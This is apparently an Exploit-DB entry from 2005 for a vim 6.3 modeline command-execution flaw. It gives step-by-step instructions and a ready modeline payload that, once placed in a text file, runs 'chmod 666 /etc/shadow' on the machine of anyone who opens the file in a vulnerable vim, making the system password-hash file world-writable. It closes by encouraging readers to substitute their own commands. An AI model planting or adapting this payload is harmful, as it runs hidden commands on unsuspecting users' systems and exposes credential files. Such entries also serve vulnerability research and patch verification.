vim 6.3 < 6.3.082 modlines Local Command Execution Exploit

ID EDB-ID:1119
Type exploitdb
Reporter Georgi Guninski
Modified 2005-07-25T00:00:00


vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit. Local exploits for multiple platform

                                            1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod\ 666\ /etc/shadow`") */

3) if modlines = on anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow
Have fun making your own commands.

The advisory can be found at:


# [2005-07-25]